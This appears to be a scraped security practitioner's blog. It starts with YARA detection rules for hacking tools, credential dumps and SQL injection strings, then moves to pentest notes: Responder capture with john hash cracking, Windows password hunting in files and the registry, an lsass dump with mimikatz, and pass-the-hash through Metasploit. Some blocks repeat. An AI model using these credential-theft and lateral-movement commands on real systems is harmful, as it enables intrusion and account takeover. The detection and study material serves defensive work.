$string13 = "Proforma" nocase
$string14 = "Purchase." nocase
$string14 = "Purchase " nocase
$string14 = "PurchaseOrder" nocase
condition:
1 of them
}
rule ClearTextPasswordFile
{
meta:
author = "@neonprimetime"
description = "Clear Text Password File"
strings:
$string0 = "password.txt" nocase
$string1 = "pwd.txt" nocase
$string2 = "passwd.txt" nocase
$string3 = "password.doc" nocase
$string4 = "pwd.doc" nocase
$string5 = "passwd.doc" nocase
$string6 = "password.xls" nocase
$string7 = "pwd.xls" nocase
$string8 = "passwd.xls" nocase
$string9 = "passwords.txt" nocase
$string10 = "pwds.txt" nocase
$string11 = "passwds.txt" nocase
$string12 = "passwords.doc" nocase
$string13 = "pwds.doc" nocase
$string14 = "passwds.doc" nocase
$string15 = "passwords.xls" nocase
$string16 = "pwds.xls" nocase
$string17 = "passwds.xls" nocase
$string18 = "web.config" nocase
$string19 = "application.config" nocase
condition:
1 of them
}
rule AdminUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Admin Web Pages"
strings:
$string0 = "/admin/" nocase
$string1 = "/wp-admin/" nocase
condition:
1 of them
}
rule HackingToolFound
{
meta:
author = "@neonprimetime"
description = "Hacking Tool Found"
strings:
$string0 = "kali.exe" nocase
$string2 = "wireshark" nocase
$string3 = "bloodhound" nocase
$string4 = "obfuscation" nocase
$string5 = "shellcode" nocase
$string6 = "keylogger" nocase
$string7 = "bypassuac" nocase
$string8 = "tokenmanipulation" nocase
$string10 = "passhash" nocase
$string11 = "kerberoast" nocase
$string12 = "ninja" nocase
$string13 = "memorynps" nocase
$string14 = "metasploit" nocase
$string15 = "smbexec" nocase
$string16 = "gpppassword" nocase
$string17 = "arpscan" nocase
$string18 = "dnscat" nocase
$string19 = "aircrack" nocase
$string20 = "bulletspassview" nocase
$string21 = "chromepass" nocase
$string22 = "credentialsfileview" nocase
$string23 = "echo.exe" nocase
$string24 = "hydra.exe" nocase
$string25 = "iepv.exe" nocase
$string26 = "inssidersetup" nocase
$string28 = "mailpv.exe" nocase
$string29 = "ministumblersetup" nocase
$string33 = "netpass.exe" nocase
$string34 = "netstumbler" nocase
$string35 = "nltest.exe" nocase
$string36 = "ophcrack" nocase
$string37 = "rdpv.exe" nocase
$string38 = "setspn" nocase
$string39 = "sniffpass" nocase
$string40 = "vaultpasswordview" nocase
$string41 = "\\ver.exe" nocase
$string42 = "vncpassview" nocase
$string43 = "webbrowserpassview" nocase
condition:
1 of them
}
rule HackingCodeFound
{
meta:
author = "@neonprimetime"
description = "Hacking Code Found"
strings:
$string0 = "WriteProcessMemory" nocase
$string1 = "VirtualAlloc" nocase
$string2 = "SetWindowsHook" nocase
$string3 = "SHCreateThread" nocase
$string4 = "FromBase64String" nocase
$string5 = "PromptForCredential" nocase
$string6 = "AdjustTokenPrivileges" nocase
$string7 = "KerberosRequestorSecurityToken" nocase
$string8 = "UnsafeNativeMethods" nocase
$string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
$string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
$string11 = "TOKEN_IMPERSONATE" nocase
$string12 = "TOKEN_ELEVATION" nocase
$string13 = "TOKEN_ALL_ACCESS" nocase
condition:
1 of them
}
rule PasswordDumpAttempt
{
meta:
author = "@neonprimetime"
description = "Password Dump Temp"
strings:
$string0 = "mimikatz" nocase
$string1 = "procdump" nocase
$string3 = "hashdump" nocase
$string4 = "pwdump" nocase
$string5 = "lsadump" nocase
condition:
1 of them
}
rule ExternalDriveAccessed
{
meta:
author = "@neonprimetime"
description = "External Drive Accessed"
strings:
$string4 = "file:///f:/" nocase
$string6 = "file:///g:/" nocase
$string8 = "mfeprom" nocase
condition:
1 of them
}
rule HackerOutputFile
{
meta:
author = "@neonprimetime"
description = "Hacker Output Files"
strings:
$string0 = "acls.csv" nocase
$string1 = "bloodhound.csv" nocase
$string2 = "dump.csv" nocase
$string3 = "dump.xml" nocase
$string4 = "dump.zip" nocase
$string5 = "firewall.txt" nocase
$string6 = "group_memberships.csv" nocase
$string7 = "hashdump.txt" nocase
$string8 = "local_admins.csv" nocase
$string9 = "lsadump.txt" nocase
$string10 = "lsass.dmp" nocase
$string11 = "lsassdump.dmp" nocase
$string12 = "mimikatz.xls" nocase
$string13 = "mini.dmp" nocase
$string14 = "netscan.xml" nocase
$string15 = "nmap.csv" nocase
$string16 = "nmap.txt" nocase
$string17 = "nmap.xml" nocase
$string18 = "openvas.csv" nocase
$string19 = "pwdump.txt" nocase
$string20 = "secretsdump.txt" nocase
$string21 = "targets.txt" nocase
$string22 = "trusts.csv" nocase
$string23 = "user_sessions.csv" nocase
$string24 = "bloodhound.bin" nocase
$string25 = ".gnmap" nocase
$string26 = ".nessus" nocase
$string27 = ".nmap" nocase
$string28 = "p0wn" nocase
condition:
1 of them
}
rule HackerUrl
{
meta:
author = "@neonprimetime"
description = "Hacker Url"
strings:
$string1 = "kali." nocase
$string2 = "/kali/" nocase
$string3 = "kali-" nocase
$string4 = "backbox." nocase
$string5 = "/backbox/" nocase
$string6 = "backbox-" nocase
$string7 = "blackarch." nocase
$string8 = "/blackarch/" nocase
$string9 = "blackarch-" nocase
$string10 = "caine-live." nocase
$string11 = "/caine-live/" nocase
$string12 = "caine-live-" nocase
$string13 = "deftlinux." nocase
$string14 = "/deftlinux/" nocase
$string15 = "deftlinux-" nocase
$string16 = "parrotsec." nocase
$string17 = "/parrotsec/" nocase
$string18 = "parrotsec-" nocase
$string19 = "altlinux./altlinux/" nocase
$string20 = "altlinux-" nocase
$string21 = "digi77." nocase
$string22 = "/digi77/" nocase
$string23 = "digi77-" nocase
$string24 = ".paterva." nocase
$string25 = "portswigger." nocase
$string26 = "exploit-db." nocase
$string27 = "/exploit-db/" nocase
$string28 = "exploit-db-" nocase
$string29 = "parrot.sh" nocase
$string30 = "/parrot.sh/" nocase
$string31 = "basealt.ru" nocase
$string32 = "/basealt.ru/" nocase
$string33 = "basealt.ru-" nocase
$string34 = "0day.today" nocase
$string35 = "/0day.today/" nocase
$string36 = "0day.today-archstrike." nocase
$string37 = "/archstrike/" nocase
$string38 = "archstrike-" nocase
condition:
1 of them
}
rule PUPSoftware
{
meta:
author = "@neonprimetime"
description = "Potentially Unwanted Software"
strings:
$string0 = "adusetup" nocase
$string1 = "advanced driver" nocase
$string2 = "anytimeastrology" nocase
$string3 = "aplusgamer" nocase
$string4 = "apnsetup" nocase
$string5 = "apnstub" nocase
$string6 = "ascsetup" nocase
$string7 = "astromenda" nocase
$string8 = "atozmanuals" nocase
$string9 = "atwrun" nocase
$string10 = "audiotoaudio" nocase
$string11 = "bringmesports" nocase
$string12 = "bytefence" nocase
$string13 = "calendarspark" nocase
$string14 = "ccleaner" nocase
$string15 = "citysearch" nocase
$string16 = "convertpdfsnowtooltab" nocase
$string17 = "coupon companion" nocase
$string18 = "couponscom" nocase
$string19 = "cursormania" nocase
$string20 = "dailybibleguide" nocase
$string21 = "dailyrecipeguidetooltab" nocase
$string22 = "dailywellnessguide" nocase
$string23 = "dictionaryboss" nocase
$string24 = "directionsandmap" nocase
$string25 = "discoverancestry" nocase
$string26 = "discoverliveradio" nocase
$string27 = "disk-defrag-setup" nocase
$string28 = "downspeedtest" nocase
$string29 = "driver-updater-setup" nocase
$string30 = "driver.talent" nocase
$string31 = "driverassist-setup" nocase
$string32 = "driverdoc" nocase
$string33 = "drivereasy" nocase
$string34 = "driverrestore" nocase
$string35 = "driversupport" nocase
$string36 = "drivertalent" nocase
$string37 = "drivertoolkit" nocase
$string38 = "driverupdate-" nocase
$string39 = "driverupdate-downloader" nocase
$string40 = "driverupdate-setup" nocase
$string41 = "driverwhiz" nocase
$string42 = "easeware" nocase
$string43 = "easydriverpro" nocase
$string44 = "easyhomedecorating" nocase
$string45 = "easypdfcombine" nocase
$string46 = "easyphotoedit" nocase
$string47 = "eliteunzip" nocase
$string48 = "emailaccessonline" nocase
$string49 = "everyday lookup" nocase
$string50 = "everydaylookup" nocase
$string51 = "filefanatic" nocase
$string52 = "filesharefanatic" nocase
$string53 = "flashplayerpro" nocase
$string54 = "flightsearchapp" nocase
$string55 = "freemakevideoconvertersetup" nocase
$string56 = "freemanuals" nocase
$string57 = "freeradiocast" nocase
$string58 = "fromdoctopdftooltab" nocase
$string59 = "funcustomcreations" nocase
$string60 = "gamingassassin" nocase
$string61 = "gamingwonderland" nocase
$string62 = "garden enthusiast" nocase
$string63 = "gardeningenthusiast" nocase
$string64 = "getflightinfo" nocase
$string65 = "getformsonline" nocase
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hyrda" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONTACT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
Monday, November 25, 2019
kali update apt-get upgrade
apt-get update (gets the sources lists for packages)
apt-get upgrade (upgrade tools)
apt-get dist-upgrade (entire kali rolling)
apt-get autoremove (removes dependencies no longer needed)
apt-get upgrade (upgrade tools)
apt-get dist-upgrade (entire kali rolling)
apt-get autoremove (removes dependencies no longer needed)
Wednesday, November 6, 2019
Python IoT search with Wget and Yara Rules
# Given a list of urls, determine what type of IoT device (or any device for that matter) they are based on you plugging in Yara rules into the .yar files
import os
import subprocess
import traceback
debug = "false"
skipDownload = "false"
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"
urls = open(input, "r")
if skipDownload == "false":
for url in urls:
url = url.rstrip()
cleanurl = url.rstrip().replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
if(debug == "true"):
print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
try:
output = subprocess.check_output(wgetCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
except Exception:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))
for htmlfile in os.listdir('.'):
if htmlfile.endswith(".html"):
if os.stat(htmlfile).st_size == 0:
print(("NoResponse,%s" % (htmlfile)))
else:
yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraRescanCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
print(("NoMatch,%s" % (htmlfile)))
except Exception:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
except Exception:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))
urls.close()
import os
import subprocess
import traceback
debug = "false"
skipDownload = "false"
input = "urls.txt"
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"
urls = open(input, "r")
if skipDownload == "false":
for url in urls:
url = url.rstrip()
cleanurl = url.rstrip().replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
if(debug == "true"):
print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
try:
output = subprocess.check_output(wgetCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
except Exception:
print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))
for htmlfile in os.listdir('.'):
if htmlfile.endswith(".html"):
if os.stat(htmlfile).st_size == 0:
print(("NoResponse,%s" % (htmlfile)))
else:
yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
if(debug == "true"):
print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
try:
output = subprocess.check_output(yaraRescanCommand, shell=True)
if "error" in output:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand, output)))
if output:
output = output.rstrip()
print(output.replace(" ",","))
else:
print(("NoMatch,%s" % (htmlfile)))
except Exception:
print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
except Exception:
print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand,traceback.print_exc())))
if(debug == "true"):
print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))
urls.close()
Labels:
Internet of Things,
IoT,
Python,
wget,
yara
Thursday, October 31, 2019
Nmap Open Web Ports to CSV
nmap scan web ports (80,443,8080,8443) and output to csv using sed
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open
nmap -T4 --max-rtt-timeout 200ms --initial-rtt-timeout 150ms --min-hostgroup 512 -Pn -p 80,443,8080,8443 10.99.106.0/24 -oG - | egrep -v "^#|Status: Up" | sed -E 's/Host\:\s([^\s]+)\s[(]([^)]*)[)]\s+Ports[:]\s80\/([^/]+)\/.+443\/([^/]+)\/.+8080\/([^/]+)\/.+8443\/([^/]+)\/.*/\1,\2,\3,\4,\5,\6/' | grep open
example:
10.99.106.10,test1.local.com,open,closed,closed,closed
10.99.106.11,,open,open,closed,closed
10.99.106.12,,open,open,closed,closed
10.99.106.76,test2.local.com,closed,open,closed,closed
Tuesday, October 22, 2019
Sample Responder command
responder -I eth0 -r -b
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
cd /usr/share/responder/logs
john --format=netntlm SMB-NTLMv1-SSP-9.9.9.9.txt --wordlist=/usr/share/wordlists/rockyou.txt
john --format=netntlmv2 SMB-NTLMv2-SSP-8.8.8.8.txt --wordlist=/usr/share/wordlists/rockyou.txt
Friday, October 18, 2019
Print all Mac Address Vendors around you (Arp -a)
# print all mac address vendors around you (using arp table and this great python library https://pypi.org/project/mac-vendor-lookup/ )
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
import os
from mac_vendor_lookup import MacLookup
myCmd = os.popen("arp -a").read()
print(myCmd)
for line in myCmd.splitlines():
for item in line.split():
if "-" in item:
if "--" not in item:
try:
print(item + ": " + MacLookup().lookup(item))
except:
print(item + ": not found")
View Stored Credentials and Runas
>cmdkey /list
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Currently stored credentials:
....
runas /savecred /user:XXXX "c:\BAD.exe"
Search inside Windows Files for passwords
>findstr /s password c:\*.ps1
Password Searching in Registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S
REG QUERY HKLM /F "password" /t REG_SZ /S
REG QUERY HKCU /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S
Get File Shares Exposed "net share"
>net share
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
print$ C:\WINDOWS\system32\spool\drivers Printer Drivers
ADMIN$ C:\WINDOWS Remote Admin
Share name Resource Remark
-------------------------------------------------------------------------------
C$ C:\ Default share
IPC$ Remote IPC
print$ C:\WINDOWS\system32\spool\drivers Printer Drivers
ADMIN$ C:\WINDOWS Remote Admin
Password Login Settings "net accounts"
>net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 30
Minimum password length: 15
Length of password history maintained: 12
Lockout threshold: 3
Lockout duration (minutes): 45
Lockout observation window (minutes): 45
Computer role: WORKSTATION
Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): 30
Minimum password length: 15
Length of password history maintained: 12
Lockout threshold: 3
Lockout duration (minutes): 45
Lockout observation window (minutes): 45
Computer role: WORKSTATION
Get File Shares Drive Letters wmic logicaldisk
>wmic logicaldisk get caption, description, providername
Caption Description ProviderName
C: Local Fixed Disk
X: Network Connection \\server\user\XXX
Y: Network Connection \\server\public
Caption Description ProviderName
C: Local Fixed Disk
X: Network Connection \\server\user\XXX
Y: Network Connection \\server\public
Print all environment variables "set"
>set
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\XXXX\AppData\Roaming
CommonProgramFiles=C:\Program Files\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=PCNAME
ComSpec=C:\WINDOWS\system32\cmd.exe
DriverData=C:\Windows\System32\Drivers\DriverData
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
Patches Installed wmic qfe
>wmic qfe
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Caption CSName Description FixComments HotFixID InstallDate InstalledBy InstalledOn Name ServicePackInEffect Status
http://support.microsoft.com/?kbid=4514366 PCNAME Update KB4514366 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4515855 PCNAME Update KB4515855
http://support.microsoft.com/?kbid=4465065 PCNAME Update KB4465065 NT AUTHORITY\SYSTEM XX/XX/XXXX
http://support.microsoft.com/?kbid=4470788 PCNAME Security Update KB4470788 XX/XX/XXXX
http://support.microsoft.com/?kbid=4489907 PCNAME Security Update KB4489907 XX/XX/XXXX
http://support.microsoft.com/?kbid=4503308 PCNAME Security Update KB4503308 NT AUTHORITY\SYSTEM XX/XX/XXXX
Windows Systeminfo
>systeminfo | findstr /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
OS Name: Microsoft Windows 10
OS Version: 10.0.XXX N/A Build XXXX
BIOS Version: Dell Inc. 1.XX, XX/XX/XXX
Tuesday, October 15, 2019
Powershell listening on a port
$socket = new-object System.Net.Sockets.TcpListener('0.0.0.0', 1080);
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
try
{
do
{
$read = $null;
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 2048);
if ($read -gt 0) {
$data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
$buffer.Clear()
if($data -ne $null -and $data .Length -gt 0){
Write-Output ("RECEIVED : [{0}]" -f $data)
$sendBack = new-object System.Byte[] 2048;
$sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
$stream.Write($sendBack, 0, $results.Length)
$sendBack.Clear()
Write-Output ("SENT BACK: [{0}]" -f $data)
}
}
}
} While ($read -gt 0);
}
finally
{
$fileStream.Close();
$socket.Stop();
$client.close();
$stream.Dispose();
}
if($socket -eq $null){
exit 1;
}
$socket.start();
$client = $socket.AcceptTcpClient();
$stream = $client.GetStream();
$buffer = new-object System.Byte[] 2048;
try
{
do
{
$read = $null;
while($stream.DataAvailable -or $read -eq $null) {
$read = $stream.Read($buffer, 0, 2048);
if ($read -gt 0) {
$data = [System.Text.Encoding]::ASCII.GetString($buffer).Trim(0x00).TrimEnd()
$buffer.Clear()
if($data -ne $null -and $data .Length -gt 0){
Write-Output ("RECEIVED : [{0}]" -f $data)
$sendBack = new-object System.Byte[] 2048;
$sendBack = [System.Text.Encoding]::UTF8.GetBytes($data)
$stream.Write($sendBack, 0, $results.Length)
$sendBack.Clear()
Write-Output ("SENT BACK: [{0}]" -f $data)
}
}
}
} While ($read -gt 0);
}
finally
{
$fileStream.Close();
$socket.Stop();
$client.close();
$stream.Dispose();
}
Wednesday, October 2, 2019
Lsass Dump Mimikatz Pass the Hash Basics
procdump -ma lsass.exe {path to where you want it dumped}\lsass.dmp
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
Mimikatz.exe
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonPasswords
Username : {user}
Domain : {domain}
NTLM : {NTLM Hash}
use auxillary/scanner/smb/smb_login
set SMBDomain {domain}
set SMBUser {user}
set RHOSTS {ip addr}
set SMBPass aad3b435b51404eeaad3b435b51404ee:{NTLM Hash}
run
good blog
https://blog.ropnop.com/practical-usage-of-ntlm-hashes/
Labels:
lsass,
Mimikatz,
Pass the hash,
Pass-the-hash,
procdump,
PTH,
SMB_login
When you can & cannot Pass the Hash
great blog
